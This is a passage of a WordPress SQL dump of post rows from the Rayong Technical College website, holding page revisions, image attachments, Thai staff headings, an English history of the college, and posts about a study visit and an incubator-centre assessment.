(3937, 3, '2018-09-18 09:57:59', '2018-09-18 02:57:59', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span>\r\n\r\n<span style=\"color: #ffffff;\">----------------------------------<a href=\"/wp-content/uploads/2018/09/18-9-2561-9-59-38.jpg\"><img class=\"aligncenter wp-image-3936 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-59-38.jpg\" alt=\"\" width=\"774\" height=\"572\" /></a>--------------------------------------------------</span>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-09-18 09:57:59', '2018-09-18 02:57:59', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(3939, 3, '2018-09-18 09:59:27', '2018-09-18 02:59:27', '', 'ว่าที่เรือตรี ชูชีพ อรุณเหลือง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%95%e0%b8%a3%e0%b8%b5-%e0%b8%8a%e0%b8%b9%e0%b8%8a%e0%b8%b5%e0%b8%9e-%e0%b8%ad%e0%b8%a3%e0%b8%b8%e0%b8%93', '', '', '2018-09-18 09:59:27', '2018-09-18 02:59:27', '', 643, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง.jpg', 0, 'attachment', 'image/jpeg', 0),
(3940, 3, '2018-09-18 10:00:19', '2018-09-18 03:00:19', ' \n<h3 style=\"text-align: center;\">นายไสว สีบูจันดี\nผู้อำนวยการวิทยาลัยเทคนิคระยอง</h3>', 'ผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '643-autosave-v1', '', '', '2018-09-18 10:00:19', '2018-09-18 03:00:19', '', 643, 'http://www.technicrayong.ac.th/643-autosave-v1/', 0, 'revision', '', 0),
(3941, 3, '2018-09-18 10:01:20', '2018-09-18 03:01:20', '<a href=\"/wp-content/uploads/2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง.jpg\"><img class=\"aligncenter size-full wp-image-3939\" src=\"/wp-content/uploads/2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง.jpg\" alt=\"\" width=\"220\" height=\"264\" /></a>\r\n<h3 style=\"text-align: center;\">ว่าที่เรือตรี ชูชีพ อรุณเหลือง\r\nผู้อำนวยการวิทยาลัยเทคนิคระยอง</h3>', 'ผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '643-revision-v1', '', '', '2018-09-18 10:01:20', '2018-09-18 03:01:20', '', 643, 'http://www.technicrayong.ac.th/643-revision-v1/', 0, 'revision', '', 0),
(3943, 3, '2019-02-26 09:01:31', '2019-02-26 02:01:31', ' \n<h3 style=\"text-align: center;\">นายอานุภาพ วาสะสิริ\nรองผู้อำนวยการฝ่ายวิชาการ</h3>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '649-autosave-v1', '', '', '2019-02-26 09:01:31', '2019-02-26 02:01:31', '', 649, 'http://www.technicrayong.ac.th/649-autosave-v1/', 0, 'revision', '', 0),
(3944, 3, '2018-09-18 10:08:55', '2018-09-18 03:08:55', '<a href=\"/wp-content/uploads/2018/01/รองอานุภาพ555.jpg\"><img class=\"aligncenter wp-image-3942 size-medium\" src=\"/wp-content/uploads/2018/01/รองอานุภาพ555-300x293.jpg\" alt=\"\" width=\"300\" height=\"293\" /></a>\r\n<h3 style=\"text-align: center;\">นายอานุภาพ วาสะสิริ\r\nรองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ</h3>', 'รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '649-revision-v1', '', '', '2018-09-18 10:08:55', '2018-09-18 03:08:55', '', 649, 'http://www.technicrayong.ac.th/649-revision-v1/', 0, 'revision', '', 0),
(3945, 3, '2018-09-18 10:10:02', '2018-09-18 03:10:02', '', 'รองอานุภาพ555', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%ad%e0%b8%b2%e0%b8%99%e0%b8%b8%e0%b8%a0%e0%b8%b2%e0%b8%9e555', '', '', '2018-09-18 10:10:02', '2018-09-18 03:10:02', '', 649, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/รองอานุภาพ555-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(3946, 3, '2018-09-18 10:11:07', '2018-09-18 03:11:07', '<a href=\"/wp-content/uploads/2018/01/รองอานุภาพ555-1.jpg\"><img class=\"aligncenter wp-image-3945 size-medium\" src=\"/wp-content/uploads/2018/01/รองอานุภาพ555-1-300x293.jpg\" alt=\"\" width=\"300\" height=\"293\" /></a>\r\n<h3 style=\"text-align: center;\">นายอานุภาพ วาสะสิริ\r\nรองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ</h3>', 'รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '649-revision-v1', '', '', '2018-09-18 10:11:07', '2018-09-18 03:11:07', '', 649, 'http://www.technicrayong.ac.th/649-revision-v1/', 0, 'revision', '', 0),
(3947, 3, '2018-09-18 10:15:05', '2018-09-18 03:15:05', '', '6-2-2561 9-56-49', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-56-49', '', '', '2018-09-18 10:15:05', '2018-09-18 03:15:05', '', 647, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/6-2-2561-9-56-49.jpg', 0, 'attachment', 'image/jpeg', 0),
(3948, 3, '2018-09-18 10:15:31', '2018-09-18 03:15:31', ' \n<h3 style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/6-2-2561-9-56-49.jpg\"><img class=\"aligncenter size-full wp-image-3947\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-56-49.jpg\" alt=\"\" width=\"150\" height=\"200\" /></a>นายยุทธนา อ่อนส้มกฤษ\nรองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</h3>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '647-autosave-v1', '', '', '2018-09-18 10:15:31', '2018-09-18 03:15:31', '', 647, 'http://www.technicrayong.ac.th/647-autosave-v1/', 0, 'revision', '', 0),
(3949, 3, '2018-09-18 10:15:37', '2018-09-18 03:15:37', ' \r\n<h3 style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/6-2-2561-9-56-49.jpg\"><img class=\"aligncenter size-full wp-image-3947\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-56-49.jpg\" alt=\"\" width=\"150\" height=\"200\" /></a>นายยุทธนา อ่อนส้มกฤษ\r\nรองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</h3>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '647-revision-v1', '', '', '2018-09-18 10:15:37', '2018-09-18 03:15:37', '', 647, 'http://www.technicrayong.ac.th/647-revision-v1/', 0, 'revision', '', 0),
(3950, 3, '2018-09-18 12:48:54', '2018-09-18 05:48:54', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\">In 1938 was the beginning of the vocational education and training for 3-years course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1942 the Hairdresser department opened providing 2-years course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1949 the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1950 the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1953 Education expanded to senior high school level and for vocational junior high school graduates including grade 9 to enter the 3-year carpentry course.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1957 the mechanic department opened up to vocational senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1960 the carpentry department opened to high vocational education and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1963 the mechanic department opened for the second time and also opened up to grade 10-12 of a vocational education construction department.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1970 the sheet metal welder department opened up to senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1976 the machine shop department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1977 the electric power department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1979 the commercial department opened up to vocational certificate.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-18 12:48:54', '2018-09-18 05:48:54', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3951, 3, '2018-09-18 12:52:09', '2018-09-18 05:52:09', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\">In 1938 was the beginning of the vocational education and training for 3-years course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1942 the Hairdresser department opened providing 2-years course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1949 the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1950 the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1953 Education expanded to senior high school level and for vocational junior high school graduates including grade 9 to enter the 3-year carpentry course.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1957 the mechanic department opened up to vocational senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1960 the carpentry department opened to high vocational education and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1963 the mechanic department opened for the second time and also opened up to grade 10-12 of a vocational education construction department.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1970 the sheet metal welder department opened up to senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1976 the machine shop department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1977 the electric power department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1979 the commercial department opened up to vocational certificate.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-18 12:52:09', '2018-09-18 05:52:09', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3952, 3, '2018-09-18 12:53:41', '2018-09-18 05:53:41', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\">In 1938 was the beginning of the vocational education and training for 3-years course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1942 the Hairdresser department opened providing 2-years course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1949 the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1950 the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1953 Education expanded to senior high school level and for vocational junior high school graduates including grade 9 to enter the 3-year carpentry course.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1957 the mechanic department opened up to vocational senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1960 the carpentry department opened to high vocational education and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1963 the mechanic department opened for the second time and also opened up to grade 10-12 of a vocational education construction department.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1970 the sheet metal welder department opened up to senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1976 the machine shop department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1977 the electric power department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1979 the commercial department opened up to vocational certificate.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-18 12:53:41', '2018-09-18 05:53:41', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3953, 3, '2018-09-18 12:57:33', '2018-09-18 05:57:33', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\">In 1938 was the beginning of the vocational education and training for 3-years course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1942 the Hairdresser department opened providing 2-years course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1949 the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1950 the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1953 Education expanded to senior high school level and for vocational junior high school graduates including grade 9 to enter the 3-year carpentry course.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1957 the mechanic department opened up to vocational senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1960 the carpentry department opened to high vocational education and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1963 the mechanic department opened for the second time and also opened up to grade 10-12 of a vocational education construction department.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1970 the sheet metal welder department opened up to senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1976 the machine shop department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1977 the electric power department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1979 the commercial department opened up to vocational certificate.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-18 12:57:33', '2018-09-18 05:57:33', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3954, 3, '2018-09-18 13:58:01', '2018-09-18 06:58:01', '<a href=\"https://www.facebook.com/incubator.rtc/media_set?set=a.2197121857219581&type=3\"><img class=\"aligncenter wp-image-3955 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-13-58-30.jpg\" alt=\"\" width=\"511\" height=\"666\" /></a>', 'ต้อนรับคณะศึกษาดูงานจากวิทยาลัยการอาชีพสอยดาว เพื่อศึกษาการดำเนินงานของศูนย์บ่มเพาะและเสริมสร้างศักยภาพครูและบุคลากรทางการศึกษาให้มีขีดความสามารถในการขับเคลื่อนตามนโยบายของสำนักงานคณะกรรมการการอาชีวศึกษา ในวันอังคารที่ 11 กันยายน 2561 ณ ห้อง SmartClass Room อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%94%e0%b8%b9%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%88%e0%b8%b2', '', '', '2018-09-18 13:58:01', '2018-09-18 06:58:01', '', 0, 'http://www.technicrayong.ac.th/?p=3954', 304, 'post', '', 0),
(3955, 3, '2018-09-18 13:56:26', '2018-09-18 06:56:26', '', '18-9-2561 13-58-30', '', 'inherit', 'closed', 'closed', '', '18-9-2561-13-58-30', '', '', '2018-09-18 13:56:26', '2018-09-18 06:56:26', '', 3954, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/18-9-2561-13-58-30.jpg', 0, 'attachment', 'image/jpeg', 0),
(3956, 3, '2018-09-18 13:57:46', '2018-09-18 06:57:46', '', '41459299_2197120207219746_4458247611698118656_o', '', 'inherit', 'closed', 'closed', '', '41459299_2197120207219746_4458247611698118656_o', '', '', '2018-09-18 13:57:46', '2018-09-18 06:57:46', '', 3954, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41459299_2197120207219746_4458247611698118656_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3957, 3, '2018-09-18 13:58:01', '2018-09-18 06:58:01', '<a href=\"https://www.facebook.com/incubator.rtc/media_set?set=a.2197121857219581&type=3\"><img class=\"aligncenter wp-image-3955 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-13-58-30.jpg\" alt=\"\" width=\"511\" height=\"666\" /></a>', 'ต้อนรับคณะศึกษาดูงานจากวิทยาลัยการอาชีพสอยดาว เพื่อศึกษาการดำเนินงานของศูนย์บ่มเพาะและเสริมสร้างศักยภาพครูและบุคลากรทางการศึกษาให้มีขีดความสามารถในการขับเคลื่อนตามนโยบายของสำนักงานคณะกรรมการการอาชีวศึกษา ในวันอังคารที่ 11 กันยายน 2561 ณ ห้อง SmartClass Room อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3954-revision-v1', '', '', '2018-09-18 13:58:01', '2018-09-18 06:58:01', '', 3954, 'http://www.technicrayong.ac.th/3954-revision-v1/', 0, 'revision', '', 0),
(3958, 3, '2018-09-18 14:00:16', '2018-09-18 07:00:16', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.2196636140601486%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา วิทยาลัยเทคนิคระยอง ได้เข้าร่วมการประเมินศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา ระดับชาติ ( 5 ดาว ) ประจำปีการศึกษา 2560 ระหว่างวันที่ 5 - 7 กันยายน 2560 ณ สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา กรุงเทพมหานคร', '', 'publish', 'closed', 'open', '', '%e0%b8%a8%e0%b8%b9%e0%b8%99%e0%b8%a2%e0%b9%8c%e0%b8%9a%e0%b9%88%e0%b8%a1%e0%b9%80%e0%b8%9e%e0%b8%b2%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%81', '', '', '2018-09-18 14:00:16', '2018-09-18 07:00:16', '', 0, 'http://www.technicrayong.ac.th/?p=3958', 303, 'post', '', 0),
(3959, 3, '2018-09-18 13:59:58', '2018-09-18 06:59:58', '', '41500274_2196630480602052_7892302092038045696_o', '', 'inherit', 'closed', 'closed', '', '41500274_2196630480602052_7892302092038045696_o', '', '', '2018-09-18 13:59:58', '2018-09-18 06:59:58', '', 3958, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41500274_2196630480602052_7892302092038045696_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3960, 3, '2018-09-18 14:00:16', '2018-09-18 07:00:16', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.2196636140601486%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา วิทยาลัยเทคนิคระยอง ได้เข้าร่วมการประเมินศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา ระดับชาติ ( 5 ดาว ) ประจำปีการศึกษา 2560 ระหว่างวันที่ 5 - 7 กันยายน 2560 ณ สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา กรุงเทพมหานคร', '', 'inherit', 'closed', 'closed', '', '3958-revision-v1', '', '', '2018-09-18 14:00:16', '2018-09-18 07:00:16', '', 3958, 'http://www.technicrayong.ac.th/3958-revision-v1/', 0, 'revision', '', 0),
